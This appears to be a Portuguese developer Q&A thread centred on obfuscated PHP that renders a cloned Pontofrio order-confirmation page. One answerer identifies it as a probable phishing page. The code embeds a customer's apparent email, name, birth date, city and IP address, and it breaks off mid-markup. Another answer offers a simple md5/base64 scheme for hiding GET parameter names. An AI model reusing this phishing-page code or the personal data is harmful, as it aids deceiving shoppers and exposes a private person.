{"site":{\"name\":"PontoFrio",\"domain\":\"pontofrio.com.br",\"acronym\":"PF","country":"BR","region\":"pt-br",\"currency\":"BRL\","test\":false},"page":{"name":\"FinalizaCompra\",\"templateName\":\"FINALIZACOMPRA",\"hasBreadCrumb":false,\"chaordicPack\":"rDBtWp1R8YcihegCdRWU2B%2BQmC1%2Bm3KLxQxKVzu7XKfNriiM8oa77UIcY6YMEavn0zqy6Pk1WxRgnHkuwMV0fg%2B5aeqd23zL68BlIL857bAdnv5KrU1Ck%2FqzNa0CHpPilE%2F1KSy%2B80YlWKFS870dtwREpCBsFCiJgiYhTh4Y97SKJnCbvKbIyG51QutUf7WEQthgDN5KqXaSs2On%2F%2FOWnippdkKMaYJDF94Y1o53jodRdb24mmPFA0MupB7W%2FopPv98NAjZvAWeT6KcU%2B%2Brla3qaEWLU%2BWfyPziBiyBWGY2l5J6ruZ%2FGWlwiZrB1JTzrn2PnXS6qoc9aLvGNNsK5Wxr2MnM2QA%2FHWJVJ%2FEUAn5%2F4AqW5PTr4S8X16rQuNoc3\",\"banners":{"icid":[]},"hotSites":{\"icid\":[]},\"seoContent\":false,\"ambienteId\":0},"session\":{\"user\":{"idUser":"11313274\",\"email":\"borgeszinho12@hotmail.com,borgeszinho12@hotmail.com\",\"age\":\"25%2C\",\"gender":"M%2CM\",\"postalCode":\"75890000\","city\":\"S%C3%A3o%20Sim%C3%A3o\",\"state\":"GO\","country\":"Brasil","loginSource\":"Site%2CSite","nascimento":"1990-10-10%2000%3A00%3A00Z%2C1990-10-10%2000%3A00%3A00Z\","tipo":\"PF%2CPF\",\"signup\":true,"firstName":\"Lucas%2CLucas",\"lastName":"Borges%2CBorges\"},"ip":\"177.106.175.145\"},"checkout\":{\"step\":\"purchase\","items\":[{"product":{\"idSku":"2717791\",\"idProduct\":\"757497\","idDepartment":"1\","idCategory\":"370",\"idBrand":\"459","nameBrand\":"Samsung\","name\":"TV%20LED%2032%E2%80%9D%20HD%20Samsung%2032FH4205%20com%20Conversor%20Digital%2C%20Fun%C3%A7%C3%A3o%20Futebol%2C%20ConnectShare%20Movie%2C%20Entradas%20HDMI%20e%20USB\","fullName":\"TV%20LED%2032%E2%80%9D%20HD%20Samsung%2032FH4205%20com%20Conversor%20Digital%2C%20Fun%C3%A7%C3%A3o%20Futebol%2C%20ConnectShare%20Movie%2C%20Entradas%20HDMI%20e%20USB\","basePrice\":965.90,"salePrice":1239.00,"attributes\":[],"discountPercentage":-28.27,"seller":{"name":\"PF- SÃO MATEUS\",\"id":12652,"price\":1239.00},"idModel\":\"UN32FH4205GXZD",\"StockAvailability":false,"flagCartao":0,"income\":0.0,\"HasReview":false,\"QtdReview":0,"RatingReview\":0.0},\"quantity":1,"itemTotalPrice\":1239.00,\"extendedWarranty\":false,\"extendedPlan":0}],\"productsTotal\":1239.00,"shippingPrice":55.34,"grandTotal\":1294.34,\"quantityTotal\":1,\"idOrder\":"73236357\","interestRate":0.00,"shippingMaxDays":13.0,\"shippingType\":\"Normal\","paymentMethod":{"Credito_Cartao-de-Credito-Visa\":1294.34},"utm\":{"source\":""}},\"tms\":{\"coreLocation":\"//carrinho.pontofrio.com.br/Js/TagManager/\","customLocation":"//carrinho.pontofrio.com.br/App_Themes/PontoFrio/js/TagManager/",\"version":{"siteMetadata":\"1.5.130305"}},"displayCase":{\"rectype":[],\"recsource\":[]}};
\n</script>\n<script type="text/javascript" charset=\"UTF-8" src=\"//carrinho.pontofrio.com.br/Js/TagManager/loader.js\"></script>\n";
mysqli_select_db(${${"GLOBALS"}["vywnyjt"]},${$xibmumfkhxj});
${${"GLOBALS"}["pkfoxj"]}="SELECT * FROM funcoes";
${${"GLOBALS"}["kdmohqu"]}=mysqli_query(${${"GLOBALS"}["vywnyjt"]},${${"GLOBALS"}["pkfoxj"]})or die(mysqli_error());
${${"GLOBALS"}["pjsocifrdu"]}=mysqli_fetch_assoc(${${"GLOBALS"}["kdmohqu"]});
${$pjobgndqiqfm}=mysqli_num_rows(${${"GLOBALS"}["kdmohqu"]});
${"GLOBALS"}["tcuivnqh"]="headers";
${${"GLOBALS"}["ismvdqjshs"]}=${$pipggarius}["chat"];
if(${${"GLOBALS"}["phnjigchrhj"]}=="0"){echo"";
}else{$aqkitlyct="chat";
echo${$aqkitlyct};
}echo "\n    </head>\n    <body>\n        <div class=\"header headerSecure\">\n            <div class=\"headerContent">\n                            <a class="logo\" href="http://www.pontofrio.com.br">Pontofrio.com.br</a>\n                <ul class=\"hLinks"><li class="atendimento\"><a href=\"http://www.pontofrio.com.br/centraldeatendimento/home.aspx" title="Central de atendimento\" class=\"lnk\">Central de atendimento</a></li><li class=\"pedidos"><a href=\"https://carrinho.pontofrio.com.br/Site/MeusPedidos.aspx" title="Meus pedidos\" class="lnk\">Meus pedidos</a></li><li class=\"secure">Ambiente <em>100% Seguro</em></li></ul>\n\n            </div>\n        \n        </div>\n        <div id="body\">\n            \n            <section class=\"contentWrapper">\n                \n<div class=\"conteudo finalizaCompra">\n    <h2 class="tit\">Obrigado por comprar no Pontofrio.com</h2>\n \n    <div class=\"finaliza\">\n        <div class=\"wrapper order\">\n            <p class="npedido\">\n                O número do seu pedido é:<br />\n                <strong>";
echo${${"GLOBALS"}["lijmxmq"]};
echo "</strong>\n            </p>\n            <div class=\"obs\">\n                <h3>Seu pedido foi realizado com sucesso.</h3>\n                <p class=\"obstxt">Em breve voc&#234;
 receber&#225;
 um e-mail de confirma&#231;
&#227;
o com todas as informa&#231;
&#245;
es da sua compra.</p>\n                <ul class=\"bts">\n                                                                                <li class=\"acompanhe"><a href='https://carrinho.pontofrio.com.br/Site/MeusPedidos.aspx' class=\"bt btMeusPedidos" title=\"Meus Pedidos">Meus Pedidos</a></li>\n                </ul>\n            </div>\n            <div class="msgApp\">\n<em>Acompanhe seus pedidos onde estiver, baixe o aplicativo do Pontofrio e aproveite!</em>\n<ul class=\"appStoreList">\n<li><a href="https://itunes.apple.com/br/app/pontofrio.com/id414724783?mt=8" title="Apple Store" class="lnk lnkApp appApple" target="_blank">Apple Store</a></li>\n<li><a href="h
```

Olhando o código, eu acho que isso deve ser uma página de phishing. Ainda mais vendo coisas como `"ip":\"177.106.175.145\"` no meio dela. O "`Ambiente <em>100% Seguro</em>`" é uma farsa.

Comment: Creio que a pergunta se refere a como ele pode fazer o mesmo com código próprio, e não "como decodificar o exemplo dado". Tirando esse pequeno detalhe, é uma explicação caprichada essa a sua (sobre essa engenharia reversa, creio ter perguntas já abordando o tema no site, lembro de ter "participado" de alguma).

Comment: esse codigo nao é meu, como eu disse no poste não quero desencriptalo quero escriptar igual, sei que é reversivel porem já é uma grande ajuda

Answer (score 0):

O PHP não mostra o source code. Tudo que estiver entre `<?php` e `?>` só será exibido com comandos de saída como o `echo` ou `print`.

Codificar o índice da variável não vai mudar nada, pois ainda terão atribuições, mas se você insiste:

```
// Variável via GET com base64 e md5
function get_variable($var) {
    return filter_input( INPUT_GET, md5(base64_encode($var)) );
}
```

Dessa forma você poderá fazer o seguinte no seu código:

```
$nome = get_variable('nome'); // Retorna o valor real da variável
```

Mas no seu url estará assim:

```
www.site.com/exemplo.php?6a567e5e8727e4da2c8e9293b8152cf7=joao_da_silva
```

Prós:

- Ninguém saberá o índice da sua variável
- Todas os índices terão o mesmo tamanho
- Como está codificado, o usuário não poderá tentar adivinhar as próximas variáveis

Contras:

- Não é necessáriamente útil
- Quanto mais legível um código melhor para você

Eu sei que estamos falando de PHP, mas tomei o "[Zen](https://www.python.org/dev/peps/pep-0020/)" para todas as linguagens que conheço.

> Se você quer proteger seu código não faça aplicações falhas.